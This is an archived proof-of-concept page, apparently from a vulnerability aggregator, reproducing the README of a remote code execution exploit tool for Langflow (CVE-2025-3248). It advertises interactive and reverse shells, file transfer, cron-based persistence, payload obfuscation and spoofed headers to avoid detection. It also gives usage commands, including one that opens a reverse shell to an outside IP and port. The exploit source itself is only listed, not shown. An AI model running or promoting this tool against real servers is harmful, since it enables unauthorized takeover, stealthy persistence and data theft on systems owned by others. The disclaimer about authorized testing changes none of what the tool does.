Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-3248 PoC — Langflow 安全漏洞

Source
https://github.com/0-d3y/langflow-rce-exploit
Associated Vulnerability
Title:Langflow 安全漏洞 (CVE-2025-3248)
Description:Langflow是Langflow开源的一个用于构建多代理和 RAG 应用程序的可视化框架。 Langflow 1.3.0之前版本存在安全漏洞,该漏洞源于/api/v1/validate/code端点存在代码注入漏洞,可能导致远程未经验证的攻击者执行任意代码。
Description
Remote Code Execution Exploit for Langflow (CVE-2025-3248) - [ By S4Tech ]
Readme
# Langflow RCE Exploit (CVE-2025-3248)

![Python Version](https://img.shields.io/badge/python-3.6%2B-blue)
![License](https://img.shields.io/badge/license-MIT-green)
![Platform](https://img.shields.io/badge/platform-Linux%20%7C%20Windows-lightgrey)

Remote Code Execution Exploit for Langflow (CVE-2025-3248)

## Features

- Automatic vulnerability detection
- Multiple exploitation modes:
  - Interactive shell
  - Single command execution
  - Reverse shell connection
- File upload capability
- Colorized user interface
- Multiple reverse shell methods
- Command history persistence


## 📌 Changelog (v2.0)

### ✨ New Features:
- **Advanced payload system** with 5 execution methods  
- **File upload/download** with Base64 encoding  
- **Persistence** via cron jobs (`persist` command)  
- **Interactive shell upgrades**:  
  - `upload local_path remote_path`  
  - `download remote_path local_path`  
  - `clear` command for terminal  

### 🛡️ Security Enhancements:
- **Automatic payload obfuscation** (Base64 + random variants)  
- **Header rotation** per request:  
  - Random `User-Agent`  
  - Spoofed `X-Forwarded-For` IPs  
- **HTTPS bypass** (self-signed cert support)  
- **No redirects** to avoid detection  

### ⚡ Technical Improvements:
- **Multi-stage vulnerability verification**  
- **Enhanced error handling** for unstable connections  
- **Full session logging** to `exploit_log.txt`  
- **Command history** persistence (`.langflow_shell_history`)  

### 📊 Version Comparison:

| Feature                | v1.0         | v2.0         |
|------------------------|--------------|--------------|
| Payload Methods        | 1            | 5            |
| File Transfer          | ❌ Not supported | ✅ Supported |
| Persistence           | ❌            | ✅           |
| Stealth Level         | Basic        | Advanced     |
| Session Logging       | ❌            | ✅           |

### 🐛 Bug Fixes:
- Fixed HTTPS connection issues  
- Improved handling of special characters in commands  
- Stabilized reverse shell reliability  



## Requirements

- Python 3.6 or newer
- Required libraries:
  - `requests`
  - `colorama`
  - `readline`

## Installation

```bash
git clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt
```

## Usage

```bash
python exploit.py <URL> [options]
```

### Available Options:

| Option              | Description                                   |
|---------------------|-----------------------------------------------|
| `--shell`           | Start interactive shell                       |
| `--reverse IP PORT` | Launch reverse shell to specified IP:PORT     |
| `--command CMD`     | Execute single command                        |
| `--verbose`         | Enable verbose output                         |
| `--timeout SEC`     | Set request timeout (default: 10s)            |

### Examples:

1. Check vulnerability:
```bash
python exploit.py http://target.com
```

2. Start interactive shell:
```bash
python exploit.py http://target.com --shell
```

3. Execute single command:
```bash
python exploit.py http://target.com --command "whoami"
```

4. Launch reverse shell:
```bash
python exploit.py http://target.com --reverse 192.168.1.100 4444
```

## Screenshots

![Image](https://raw.githubusercontent.com/0-d3y/langflow-rce-exploit/refs/heads/main/Langflow-Figure-1-updated%20(1).png)  


## Warning

âڑ ï¸ڈ This tool is for **educational and authorized testing purposes only**.  
âڑ ï¸ڈ Unauthorized use against systems you don't own or have permission to test is illegal.

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

## Author

- **Mr.SaMi**  
  [![Twitter](https://img.shields.io/badge/Twitter-@Linux_ye-blue)](https://twitter.com/Linux_ye)  
  [![Instagram](https://img.shields.io/badge/Instagram-@s4tech.ye-purple)](https://instagram.com/s4tech.ye)

## Contributing

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.
File Snapshot

 [4.0K]  /data/pocs/16adf7c88402d2c37999b6b52826825af928c2ab
├── [9.5K]  exploit.py
├── [100K]  Langflow-Figure-1-updated (1).png
├── [   1]  output.txt
├── [4.0K]  README.md
└── [  66]  requirements.txt

0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.